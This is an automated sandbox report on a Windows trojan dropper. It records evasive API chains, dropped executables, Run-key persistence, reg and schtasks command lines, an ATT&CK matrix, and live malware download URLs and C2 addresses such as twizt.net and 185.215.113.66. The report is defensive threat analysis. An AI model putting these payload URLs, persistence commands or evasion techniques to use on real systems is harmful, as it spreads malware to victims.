Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evaded block: after key decision (graph_3-4357)
Source: C:\Windows\sysnldcvmr.exe | Evaded block: after key decision (graph_7-4355)
Source: C:\Windows\sysnldcvmr.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_4-5747)
Source: C:\Windows\sysnldcvmr.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_4-4374)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_3-4371)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_3-5280)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | API coverage: 3.9 %
Source: C:\Windows\sysnldcvmr.exe | API coverage: 1.0 %
Source: C:\Windows\sysnldcvmr.exe TID: 7688 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\sysnldcvmr.exe TID: 7688 | Thread sleep count: 161 > 30
Source: C:\Windows\sysnldcvmr.exe TID: 4428 | Thread sleep time: -93990s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\240016073.exe TID: 7932 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
Source: C:\Windows\sysnldcvmr.exe | Thread delayed: delay time: 40000
Source: C:\Windows\sysnldcvmr.exe | Thread delayed: delay time: 93990
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Thread delayed: delay time: 922337203685477
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI!m
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000703000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | API call chain: ExitProcess graph end node (graph_3-4366)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | API call chain: ExitProcess graph end node (graph_3-4356)
Source: C:\Windows\sysnldcvmr.exe | API call chain: ExitProcess graph end node (graph_4-4391)
Source: C:\Windows\sysnldcvmr.exe | API call chain: ExitProcess graph end node (graph_4-4358)
Source: C:\Windows\sysnldcvmr.exe | API call chain: ExitProcess graph end node (graph_4-4366)
Source: C:\Windows\sysnldcvmr.exe | API call chain: ExitProcess graph end node (graph_7-4390)
Source: C:\Windows\sysnldcvmr.exe | API call chain: ExitProcess graph end node (graph_7-4366)
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Code function: 0_2_009C1B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00409EE0 GetProcessHeaps
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\240016073.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: GetLocaleInfoA,strcmp,3_2_0040E730
Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,4_2_0040E730
Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,7_2_0040E730
Source: C:\Users\user\AppData\Local\Temp\240016073.exeQueries volume information: C:\Users\user\AppData\Local\Temp\240016073.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1A78 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_009C1A78
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040D710
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040D710
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,7_2_00401470
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,7_2_00402020
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,7_2_0040D710
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,7_2_004013B0
MITRE ATT&CK matrix, one line per tactic. The number in parentheses is the count badge shown beside a technique in the matrix (techniques with matched signatures); techniques without a number carry no badge.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (11); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Masquerading (121); Modify Registry (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Hidden Files and Directories (1)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (2); System Information Discovery (25); Security Software Discovery (231); Process Discovery (2); Virtualization/Sandbox Evasion (31); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (22); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1564700, Sample: LM94OE0VNK.exe, Start date: 28/11/2024, Architecture: WINDOWS, Score: 100). Node numbers are the graph's own; a number in brackets after a process name is the count badge shown on that node.

Start (node 2)
  DNS: twizt.net
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 5 other signatures
  Started: LM94OE0VNK.exe [16] (node 11); sysnldcvmr.exe (node 16)
LM94OE0VNK.exe [16] (node 11)
  Network: twizt.net 185.215.113.66, ports 49702, 49703, 49706, WHOLESALECONNECTIONSNL, Portugal
  Dropped: C:\Users\user\AppData\...\2374323789.exe (PE32); C:\Users\user\AppData\Local\...\newtpp[1].exe (PE32)
  Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
  Started: 2374323789.exe [1 1] (node 18)
2374323789.exe [1 1] (node 18)
  Dropped: C:\Windows\sysnldcvmr.exe (PE32)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 5 other signatures
  Started: sysnldcvmr.exe [20] (node 22)
sysnldcvmr.exe [20] (node 22)
  Network: 80.191.218.209, port 40500, TCIIR, Iran (ISLAMIC Republic Of); 90.156.160.6, port 40500, MASTERHOST-ASMoscowRussiaRU, Russian Federation; 4 other IPs or domains
  Dropped: C:\Users\user\AppData\...\2693731851.exe (PE32); C:\Users\user\AppData\Local\...\240016073.exe (PE32+)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 4 other signatures
  Started: 240016073.exe [2] (node 27); 2693731851.exe (node 30)
240016073.exe [2] (node 27)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: cmd.exe [1] (node 32); cmd.exe [1] (node 35)
2693731851.exe (node 30)
  Signatures: Antivirus detection for dropped file
cmd.exe [1] (node 32)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
  Started: conhost.exe (node 37); reg.exe [1] (node 39)
cmd.exe [1] (node 35)
  Started: conhost.exe (node 41); schtasks.exe [1] (node 43)
Source | Detection | Scanner | Label
LM94OE0VNK.exe | 53% | ReversingLabs | Win32.Trojan.MintZard
LM94OE0VNK.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\2374323789.exe | 100% | Avira | HEUR/AGEN.1315882
C:\Windows\sysnldcvmr.exe | 100% | Avira | HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2693731851.exe | 100% | Avira | HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | 100% | Avira | HEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2374323789.exe | 100% | Joe Sandbox ML |
C:\Windows\sysnldcvmr.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\240016073.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2693731851.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | 75% | ReversingLabs | Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\2374323789.exe | 75% | ReversingLabs | Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\240016073.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\2693731851.exe | 75% | ReversingLabs | Win32.Trojan.MintZard
C:\Windows\sysnldcvmr.exe | 75% | ReversingLabs | Win32.Trojan.MintZard

No Antivirus matches
Source | Detection | Scanner | Label
http://twizt.net/ | 0% | Avira URL Cloud | safe
http://91.202.233.141/gonupll9z | 100% | Avira URL Cloud | malware
http://twizt.net/peinstall.phpP | 0% | Avira URL Cloud | safe
http://185.215.113.66/2C: | 100% | Avira URL Cloud | malware
http://91.202.233.141/gonup | 100% | Avira URL Cloud | malware
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s | 100% | Avira URL Cloud | malware
http://185.215.113.66/1y | 100% | Avira URL Cloud | malware
http://185.215.113.66/2IIC: | 100% | Avira URL Cloud | malware
http://185.215.113.66/1~ | 100% | Avira URL Cloud | malware
http://185.215.113.66/2? | 100% | Avira URL Cloud | malware
http://twizt.net/peinstall.php%temp%%s | 0% | Avira URL Cloud | safe
http://91.202.233.141/gonup8 | 100% | Avira URL Cloud | malware
http://twizt.net/peinstall.phpvPO | 0% | Avira URL Cloud | safe
http://twizt.net/newtpp.exeP0 | 0% | Avira URL Cloud | safe
http://91.202.233.141/gonup1 | 100% | Avira URL Cloud | malware
http://twizt.net/newtpp.exe | 0% | Avira URL Cloud | safe
http://twizt.net/peinstall.php | 0% | Avira URL Cloud | safe
http://twizt.net/peinstall.phpystem32 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
twizt.net | 185.215.113.66 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.66/1y | sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://twizt.net/ | LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/1~ | sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://twizt.net/peinstall.phpP | LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.202.233.141/gonupll9z | sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | newtpp[1].exe.0.dr | false | | high
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s | 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.dr | false | Avira URL Cloud: malware | unknown
http://91.202.233.141/ | 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.dr | false | | high
http://91.202.233.141/gonup | sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688560492.00000000020D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/envelope/ | newtpp[1].exe.0.dr | false | | high
http://185.215.113.66/2 | sysnldcvmr.exe, 00000004.00000002.1688593287.00000000021DB000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://185.215.113.66/2C: | sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.66/1 | sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.66/2IIC: | sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000733000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.66/2? | sysnldcvmr.exe, 00000004.00000002.1688257376.000000000075B000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://twizt.net/peinstall.phpp | LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://91.202.233.141/gonup8 | sysnldcvmr.exe, 00000004.00000002.1690356108.00000000057AD000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://twizt.net/peinstall.php%temp%%s | LM94OE0VNK.exe | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/ | 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.dr | false | | high
http://91.202.233.141/gonup1 | sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://twizt.net/newtpp.exeP0 | LM94OE0VNK.exe | false | Avira URL Cloud: safe | unknown
http://twizt.net/peinstall.phpystem32 | LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/peinstall.phpvPO | LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/newtpp.exe | LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000085E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://twizt.net/peinstall.php | LM94OE0VNK.exe | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.66 | twizt.net | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
217.30.162.161 | unknown | Uzbekistan | 39032 | ISPETCUZ | false
178.22.172.2 | unknown | Kazakhstan | 41798 | TTC-ASJSCTranstelecomKZ | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
90.156.160.6 | unknown | Russian Federation | 25532 | MASTERHOST-ASMoscowRussiaRU | true
91.202.233.141 | unknown | Russian Federation | 9009 | M247GB | false
80.191.218.209 | unknown | Iran (ISLAMIC Republic Of) | 58224 | TCIIR | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1564700
                  Start date and time:2024-11-28 18:17:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:LM94OE0VNK.exe
                  renamed because original name is a hash value
                  Original Sample Name:8ce09f13942ab5bcb81b175996c8385f.exe
                  Detection:MAL
                  Classification:mal100.evad.winEXE@20/10@1/7
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 69
                  • Number of non-executed functions: 152
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 20.109.209.108
                  • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, slscr.update.microsoft.com, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: LM94OE0VNK.exe
Time | Type | Description
12:18:37 | API Interceptor | 2x Sleep call for process: sysnldcvmr.exe modified
18:18:37 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysnldcvmr.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.66 | U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | ukOlLduCBM.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | Bjl3geiFEK.exe | malicious | Phorpiex | 185.215.113.66/2
185.215.113.66 | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/1
185.215.113.66 | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/2
185.215.113.66 | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | thcdVit1dX.exe | malicious | Phorpiex | 185.215.113.66/3
185.215.113.66 | bBcZoComLl.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/4
185.215.113.66 | file.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
217.30.162.161 | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig |
217.30.162.161 | lRT1FK9PcL.exe | malicious | Phorpiex |
217.30.162.161 | H6uKtOX196.exe | malicious | Phorpiex, Xmrig |
217.30.162.161 | yBIZ7wHvEC.exe | malicious | Phorpiex |
239.255.255.250 | file.exe | malicious | Clipboard Hijacker, Cryptbot |
239.255.255.250 | file.exe | malicious | Cryptbot |
239.255.255.250 | file.exe | malicious | Amadey, Stealc, Vidar |
239.255.255.250 | https://application-workspace.com/red-bull/id-38772 | malicious | Unknown |
